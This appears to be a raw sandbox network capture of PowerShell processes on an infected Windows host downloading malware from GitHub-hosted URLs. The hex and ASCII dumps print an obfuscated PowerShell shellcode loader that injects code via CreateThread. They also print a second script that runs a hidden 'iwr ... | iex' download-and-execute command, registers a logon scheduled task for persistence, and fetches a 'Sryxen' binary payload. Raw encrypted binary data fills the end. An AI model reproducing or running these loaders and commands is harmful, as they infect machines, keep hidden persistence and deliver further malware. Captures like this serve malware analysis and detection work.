2025-01-08 09:15:34 UTC	650	OUT	GET /github-production-release-asset-2e65be/884985882/df985353-b412-45be-a5df-5d50a4ddaf53?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091533Z&X-Amz-Expires=300&X-Amz-Signature=71849342e45026ae948e7cc8f90ab3779bcd14dee0966a571aa2cf9824444811&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dsryxen_loader.ps1&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:34 UTC	846	IN	HTTP/1.1 200 OK Connection: close Content-Length: 3418 Content-Type: application/octet-stream Last-Modified: Thu, 07 Nov 2024 20:29:49 GMT ETag: "0x8DCFF6AED64A11E" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 35071e22-901e-0028-6735-4f80fd000000 x-ms-version: 2024-11-04 x-ms-creation-time: Thu, 07 Nov 2024 20:29:49 GMT x-ms-blob-content-md5: aXiAyvuBlhXMnGlrTXMY2w== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=sryxen_loader.ps1 x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Wed, 08 Jan 2025 09:15:34 GMT X-Served-By: cache-iad-kiad7000095-IAD, cache-nyc-kteb1890099-NYC X-Cache: HIT, MISS X-Cache-Hits: 16, 0 X-Timer: S1736327734.350618,VS0,VE8
2025-01-08 09:15:34 UTC	1378	IN	Data Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 28 27 53 69 6c 27 2b 27 65 6e 74 27 2b 27 6c 27 2b 27 79 43 6f 6e 74 69 6e 75 27 2b 27 65 27 29 0d 0a 66 75 6e 63 74 69 6f 6e 20 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6d 6f 64 2c 20 24 66 63 65 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 60 52 60 52 65 60 4e 54 64 4f 4d 61 49 6e 22 2e 28 28 27 47 45 27 2b 27 54 27 29 2b 28 27 61 73 27 2b 27 53 27 29 2b 28 27 45 6d 42 4c 49 65 27 2b 27 53 27 29 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 6c 4f 60 42 61 4c 61 73 53 60 65 4d 42 4c 59 60 43 60 41 63 68 45 22 20 2d 61 6e 64 20 24 5f 2e 22 6c 6f 60 43 61 60 54 49 6f 4e 22 2e Data Ascii: $ProgressPreference = ('Sil'+'ent'+'l'+'yContinu'+'e')function SryxenLoader { Param ($mod, $fce) $assem = ([AppDomain]::"cU`R`Re`NTdOMaIn".(('GE'+'T')+('as'+'S')+('EmBLIe'+'S')).Invoke() \| ? { $_."GlO`BaLasS`eMBLY`C`AchE" -and $_."lo`Ca`TIoN".
2025-01-08 09:15:34 UTC	1378	IN	Data Raw: 27 65 66 6c 65 63 74 27 2b 27 65 64 44 65 6c 65 67 61 74 27 2b 27 65 27 29 29 29 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 45 6d 69 74 2e 41 73 73 65 6d 62 6c 79 42 75 69 6c 64 65 72 41 63 63 65 73 73 5d 3a 3a 22 72 60 55 4e 22 29 2e 28 27 44 45 27 2b 28 27 66 69 6e 65 64 79 27 2b 27 6e 41 27 29 2b 28 27 4d 69 63 6d 27 2b 27 4f 27 29 2b 27 64 55 27 2b 27 6c 45 27 29 2e 49 6e 76 6f 6b 65 28 28 27 49 27 2b 27 6e 4d 65 6d 27 2b 27 6f 72 79 4d 27 2b 27 6f 64 27 2b 27 75 6c 65 27 29 2c 20 24 66 61 6c 73 65 29 2e 28 28 27 64 45 46 27 2b 27 69 6e 27 29 2b 27 65 27 2b 28 27 54 79 27 2b 27 70 45 27 29 29 2e 49 6e 76 6f 6b 65 28 28 27 4d 79 44 27 2b 27 65 6c 65 67 61 74 65 54 79 27 2b 27 70 27 2b 27 65 27 29 2c 20 28 27 43 6c 27 2b 27 61 73 27 Data Ascii: 'eflect'+'edDelegat'+'e'))), [System.Reflection.Emit.AssemblyBuilderAccess]::"r`UN").('DE'+('finedy'+'nA')+('Micm'+'O')+'dU'+'lE').Invoke(('I'+'nMem'+'oryM'+'od'+'ule'), $false).(('dEF'+'in')+'e'+('Ty'+'pE')).Invoke(('MyD'+'elegateTy'+'p'+'e'), ('Cl'+'as'
2025-01-08 09:15:34 UTC	662	IN	Data Raw: 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 43 6f 27 2b 27 70 59 27 29 2e 49 6e 76 6f 6b 65 28 24 73 72 79 78 65 6e 2c 20 30 2c 20 24 6c 70 4d 65 6d 2c 20 24 73 72 79 78 65 6e 2e 22 4c 65 60 4e 60 47 74 48 22 29 0d 0a 24 68 54 68 72 65 61 64 20 3d 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 67 65 27 2b 28 27 54 64 65 27 2b 27 4c 27 29 2b 28 27 45 27 2b 27 67 61 74 45 27 29 2b 27 46 6f 27 2b 27 52 27 2b 28 27 66 75 6e 63 27 2b 27 54 49 27 2b 27 6f 4e 70 27 29 2b 27 6f 69 27 2b 27 4e 54 27 2b 27 65 52 27 29 2e 49 6e 76 6f 6b 65 28 28 53 72 79 78 65 6e 4c 6f 61 64 65 72 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 43 72 65 61 74 65 54 68 72 65 61 64 29 2c 20 28 64 65 6c 67 Data Ascii: s.Marshal]::('Co'+'pY').Invoke($sryxen, 0, $lpMem, $sryxen."Le`N`GtH")$hThread = [System.Runtime.InteropServices.Marshal]::('ge'+('Tde'+'L')+('E'+'gatE')+'Fo'+'R'+('func'+'TI'+'oNp')+'oi'+'NT'+'eR').Invoke((SryxenLoader kernel32.dll CreateThread), (delg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49855	140.82.121.3	443	1916	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:34 UTC	201	OUT	GET /43a1723/test/releases/download/siu/lmaoxclient HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2025-01-08 09:15:34 UTC	958	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:34 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:34 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49859	185.199.110.133	443	7516	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:34 UTC	200	OUT	GET /43a1723/test/main/download.ps1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: raw.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:34 UTC	899	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5232 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "79c6591c569aa2b57425683d34835c5122f5baa556e8f14cd9ff82a555abf7c6" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 46F1:265C73:3D2799:43EA14:677E422C Accept-Ranges: bytes Date: Wed, 08 Jan 2025 09:15:34 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740061-EWR X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1736327734.409317,VS0,VE1 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: a8aabe382063687f217e5add7ace3e5f0be58541 Expires: Wed, 08 Jan 2025 09:20:34 GMT Source-Age: 10
2025-01-08 09:15:34 UTC	1378	IN	Data Raw: 41 64 64 2d 54 79 70 65 20 40 22 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 3b 0a 20 20 20 20 70 75 62 6c 69 63 20 63 6c 61 73 73 20 43 6f 6e 73 6f 6c 65 57 69 6e 64 6f 77 55 74 69 6c 73 20 7b 0a 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 22 29 5d 0a 20 20 20 20 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 49 6e 74 50 74 72 20 47 65 74 43 6f 6e 73 6f 6c 65 57 69 6e 64 6f 77 28 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 75 73 65 72 33 32 2e 64 6c 6c 22 29 5d 0a 20 20 20 20 20 20 20 20 70 75 Data Ascii: Add-Type @" using System; using System.Runtime.InteropServices; public class ConsoleWindowUtils { [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow(); [DllImport("user32.dll")] pu
2025-01-08 09:15:34 UTC	1378	IN	Data Raw: 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 0a 0a 0a 23 20 4b 69 e1 bb 83 6d 20 74 72 61 20 78 65 6d 20 73 63 72 69 70 74 20 63 c3 b3 20 71 75 79 e1 bb 81 6e 20 71 75 e1 ba a3 6e 20 74 72 e1 bb 8b 20 6b 68 c3 b4 6e 67 0a 69 66 20 28 2d 6e 6f 74 20 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 5d 20 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 3a 3a 41 64 6d 69 6e 69 73 74 72 Data Ascii: pe -AssemblyName System.Windows.Forms# Kim tra xem script c quyn qun tr khngif (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administr
2025-01-08 09:15:34 UTC	1378	IN	Data Raw: 74 28 60 22 77 73 63 72 69 70 74 2e 73 68 65 6c 6c 60 22 29 2e 72 75 6e 28 60 22 70 6f 77 65 72 73 68 65 6c 6c 20 60 69 77 72 28 27 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 34 33 61 31 37 32 33 2f 74 65 73 74 2f 6d 61 69 6e 2f 64 6f 77 6e 6c 6f 61 64 2e 70 73 31 27 29 7c 69 65 78 60 22 2c 30 29 28 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 29 22 0a 24 74 61 73 6b 5f 74 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 65 72 20 2d 41 74 4c 6f 67 4f 6e 0a 24 74 61 73 6b 5f 73 65 74 74 69 6e 67 73 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 53 65 74 74 69 6e 67 73 53 65 74 20 2d 41 6c 6c 6f 77 53 74 61 72 74 49 66 4f 6e 42 61 74 74 65 72 69 65 73 Data Ascii: t(`"wscript.shell`").run(`"powershell `iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')\|iex`",0)(window.close)"$task_trigger = New-ScheduledTaskTrigger -AtLogOn$task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries
2025-01-08 09:15:34 UTC	1098	IN	Data Raw: 22 70 6f 77 65 72 73 68 65 6c 6c 22 20 2d 41 72 67 75 6d 65 6e 74 20 22 49 27 45 27 58 28 24 64 6f 77 6e 6c 6f 61 64 29 22 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 50 61 73 73 54 68 72 75 0a 0a 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 46 69 6c 65 53 79 73 74 65 6d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 4e 65 74 2e 48 74 74 70 0a 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 43 6f 6d 6d 61 6e 64 20 69 77 72 20 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 76 69 6c 42 79 74 65 63 6f 64 65 2f Data Ascii: "powershell" -Argument "I'E'X($download)" -WindowStyle Hidden -PassThruAdd-Type -AssemblyName System.IO.Compression.FileSystemAdd-Type -AssemblyName System.Net.HttpStart-Process powershell -ArgumentList "-Command iwr 'https://github.com/EvilBytecode/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49863	140.82.121.3	443	1156	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:35 UTC	191	OUT	GET /EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com
2025-01-08 09:15:35 UTC	962	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Wed, 08 Jan 2025 09:15:35 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939-4051-a1b9-cad0d16fddc3?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091535Z&X-Amz-Expires=300&X-Amz-Signature=d56a35e8a02c4927d06631767194b22bca897731c61334d3f71d41626b4986d9&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DSryxenBuilt.bin&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-01-08 09:15:35 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49869	185.199.111.133	443	1916	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 09:15:35 UTC	644	OUT	GET /github-production-release-asset-2e65be/805647875/b2a5a7dc-5521-4d20-afaf-8cef231516e5?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250108%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250108T091534Z&X-Amz-Expires=300&X-Amz-Signature=9fdf61ee1f5b4e28977c1309ad3394caf7c66405c5945baf7eacf935f35496e5&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dlmaoxclient&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2025-01-08 09:15:35 UTC	842	IN	HTTP/1.1 200 OK Connection: close Content-Length: 69589 Content-Type: application/octet-stream Last-Modified: Tue, 05 Nov 2024 10:11:14 GMT ETag: "0x8DCFD822E7CC71F" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 04fa98ee-901e-004a-320e-4642da000000 x-ms-version: 2024-11-04 x-ms-creation-time: Tue, 05 Nov 2024 10:11:14 GMT x-ms-blob-content-md5: jFLq8nh2MBNP1YMhZvGQhA== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=lmaoxclient x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Wed, 08 Jan 2025 09:15:35 GMT X-Served-By: cache-iad-kcgs7200098-IAD, cache-nyc-kteb1890024-NYC X-Cache: HIT, MISS X-Cache-Hits: 32, 0 X-Timer: S1736327735.274554,VS0,VE56
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: e8 c0 ad 00 00 c0 ad 00 00 7a 69 d4 d8 07 d3 f6 f6 2c 16 98 b8 dd fb 3b 2a 5b f3 a6 7c f6 3f a9 26 5e 81 ab 33 9e c2 d4 0b 00 00 00 00 16 38 af 01 58 81 86 02 d9 37 bf 91 ed 78 8b 2c 50 f7 d0 18 ed f9 d8 c5 a8 b9 fb fe e6 3b 46 ac 4e 9b d6 67 b8 44 ef 9d fb 5f 32 ba 30 78 33 21 2b 89 db 15 29 62 e8 1f 71 8e e9 fd 84 27 e9 1f b9 49 09 7a c0 b2 c8 54 85 de 77 4a b8 e6 59 15 ee 43 d5 33 a9 bd 9b 9d dc 26 e1 f3 21 08 d5 7d 45 65 0d 43 1c 4a d4 06 4a 8d de b5 b2 60 ab ae 3c 16 76 b2 a9 0c 0c e5 27 a3 44 01 66 ce 67 8e 2c da 69 a0 28 04 2e f6 75 2b d2 a8 33 f3 6c 3b 68 cc c5 fd d6 2a 07 df 21 5f 5a 97 6e a9 eb 28 df c5 42 68 b6 3b e6 2e ba ad 61 ab d8 77 36 f4 68 05 62 49 cb 29 7b 8f 1f d4 85 b9 d4 c9 4f 17 94 dc 12 ce a9 2e d8 7f dd 9f ed 35 5a a4 f7 29 85 19 Data Ascii: zi,;[\|?&^38X7x,P;FNgD_20x3!+)bq'IzTwJYC3&!}EeCJJ`<v'Dfg,i(.u+3l;h!_Zn(Bh;.aw6hbI){O.5Z)
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 71 18 cf ab ab 34 e2 7e fd 3e b0 fe 29 6b 5f d5 99 5a 38 0c 9d a6 b8 53 9a 8f 20 d4 0a cc 07 a4 ea 01 e9 67 dc 7e 79 3a a5 7b fc 47 f3 55 c1 b8 26 34 97 49 f2 ec c6 0d ca 8d f1 5c fb c4 ee 3b 48 68 36 0e c0 08 13 30 61 df 44 4d 10 31 38 5d 5f fa d4 c5 a7 b5 a9 3f b9 f6 9d 32 49 22 c7 5f 2a e8 a7 6b c4 a4 d6 30 7f ce bd dd 02 e9 c6 d1 1f 6e d2 6e 4d 07 89 26 87 3c 26 29 b4 73 3d 98 c4 e2 e4 3d 13 65 a7 b3 4f 64 34 b3 49 22 65 c4 98 2a 63 42 6f e8 b6 71 2f 7d 82 fc a9 96 41 53 82 d5 31 ab 46 31 bd f6 fd 0c e0 22 6d 29 07 9c 72 40 ce ce a7 82 6a a8 e6 ab 13 5e f3 c5 d0 90 50 4e ac 44 27 21 34 62 2c ef b4 14 95 12 4a 57 85 bd 9e 7e b5 e4 db 83 21 29 84 90 c8 1b 4a aa 81 b1 ee 2d ca 4e 6d 6a 63 4c 7b b8 20 1b 4a 47 79 ef 20 01 69 7b b7 f1 3e 48 d9 d8 e5 2d d5 Data Ascii: q4~>)k_Z8S g~y:{GU&4I\;Hh60aDM18]_?2I"_k0nnM&<&)s==eOd4I"ecBoq/}AS1F1"m)r@j^PND'!4b,JW~!)J-NmjcL{ JGy i{>H-
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: ce 69 bb e9 aa 2e 4f ee 62 d5 27 96 8c 0b 69 d8 48 e0 c5 95 5b 84 cb f4 fb af 9e f3 32 fe c7 3e c1 aa 60 78 d2 0d d5 00 e4 df 01 cf cb 35 37 cf e3 7f 80 15 71 db 6e 70 43 2e 6c 08 3c 5b e7 9b de e9 a0 f9 32 c6 5f 5b 01 28 f2 75 8b 2e 3a a3 7f 9b e7 b6 52 6a 0b bc d5 c9 f7 d2 b5 13 fc e2 7d 6e 0c a9 b5 19 b0 2f 19 31 8a 72 8e 51 85 ac 43 a8 27 32 a8 b5 de 6e db 45 fe e8 79 15 c5 2a be cc a6 f6 3f 1c c6 6d 98 d0 ce cd f8 0c 40 d6 6a d6 85 1a 2e 8c 31 a8 09 4e 70 75 d9 72 f7 c7 40 b5 37 41 4a 9f 3f d9 56 69 e0 88 68 2f 5e 05 6b ed c1 c1 d2 30 75 33 85 44 0c 3f 0b e8 6b 28 1e a1 3c fd 4d dd bd 75 33 58 02 cb 1b f0 77 30 de 39 da fe 9a 8c 96 f2 90 38 3c c3 8c 7e 00 4d 2b ae 6f 2c 65 9a d9 4f 75 4f 69 c0 09 79 e7 a2 59 11 6e ee 08 93 22 d9 15 45 65 69 56 f6 5d Data Ascii: i.Ob'iH[2>`x57qnpC.l<[2_[(u.:Rj}n/1rQC'2nEy*?m@j.1Npur@7AJ?Vih/^k0u3D?k(<Mu3Xw098<~M+o,eOuOiyYn"EeiV]
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 2a e3 08 be 26 4f f4 d3 b5 40 7c d5 82 8b d5 3a cc a5 e4 3b 0f e0 cf ad 69 f6 ab c3 6a b4 48 fc e5 2a fb 24 86 91 6c 20 00 84 ef 58 b9 69 50 80 2a 71 22 b1 ef f4 f0 7c 9d 2c 5f 30 a4 57 29 13 3e 0f 41 38 38 9b f5 4d 2d 7b ef 63 2b bd 2b ad 94 2b 44 03 cc 24 1b d6 bc 6f 1c da ce 8a d1 1d 29 68 3e 80 07 75 67 43 6f 16 8e 75 93 c5 c6 cd 05 f5 3f 59 0a 68 8a 72 a1 e9 3f 2a 5c 5e bc 5d 0f ea 80 2d 4f c2 b7 89 5d 2f 25 d8 30 44 b4 16 2e 69 3f 6c d3 17 b0 b2 3e a2 3d 2a 5a f0 36 dd 4a dc 60 35 7b 41 fc d3 c2 b9 5a 17 5a 09 9b 25 c6 4d b2 6a c8 72 97 eb 9c ad 63 07 83 0b 35 d1 7c cb 02 78 b6 61 95 be 23 f2 de 01 23 db 81 e5 52 5b 01 40 ed dd d4 d5 e8 b8 04 95 12 e4 3b ce 42 91 96 1a d7 c8 2d 5d 60 ad 55 32 f4 b3 a9 79 77 a1 27 af a2 57 d9 f8 2e 3a a4 85 c6 6b 6d Data Ascii: &O@\|:;ijH$l XiPq"\|,_0W)>A88M-{c+++D$o)h>ugCou?Yhr?\^]-O]/%0D.i?l>=*Z6J`5{AZZ%Mjrc5\|xa##R[@;B-]`U2yw'W.:km
2025-01-08 09:15:35 UTC	1378	IN	Data Raw: 60 f9 77 a4 e0 ca ae f2 99 1a c2 7c a0 cb fb d7 3c 56 56 21 a0 9a 1f 24 bb 41 14 9e 22 be d1 02 f6 87 c9 e4 97 74 dd d2 b6 43 05 d4 71 4f a6 fd 1e ac 60 e8 01 f9 d6 7c 48 20 c1 a1 f8 31 37 31 ee be c3 64 5e 9d 0a 74 9a e9 b4 33 a6 f0 3c 9a 90 ad c3 c5 f6 7b 35 b7 20 e6 6f 74 6a 0e 6f 2d d0 ae 33 55 f2 e9 d2 21 8d 95 dd 56 0f 85 39 01 9b 27 d1 2f f5 dd 59 08 8c 88 ea f4 05 c7 05 6c 75 1d ab 6a 2f f8 98 1f 28 0a d1 58 bc 5e 87 ff 6d 20 15 ac da 81 b6 3a 95 e0 c6 2d 97 3e dc 74 b6 ac 76 eb 68 e0 6b f0 0a f6 b8 61 6b cc 5c 1a 3a 61 10 de 39 42 33 bb f1 72 e2 f8 f1 43 26 8c 68 e6 fa 56 d7 26 4b 9a cb 34 b8 f5 5e 0e 94 64 71 1c d6 18 39 13 51 0a ee a3 7a 72 ed 3d a3 46 66 17 ab 4e e1 b6 86 7f 2d fe b8 12 15 0e 57 d2 88 25 28 78 64 57 e6 89 a9 e2 af 8c 8c 19 3e Data Ascii: `w\|<VV!$A"tCqO`\|H 171d^t3<{5 otjo-3U!V9'/Yluj/(X^m :->tvhkak\:a9B3rC&hV&K4^dq9Qzr=FfN-W%(xdW>
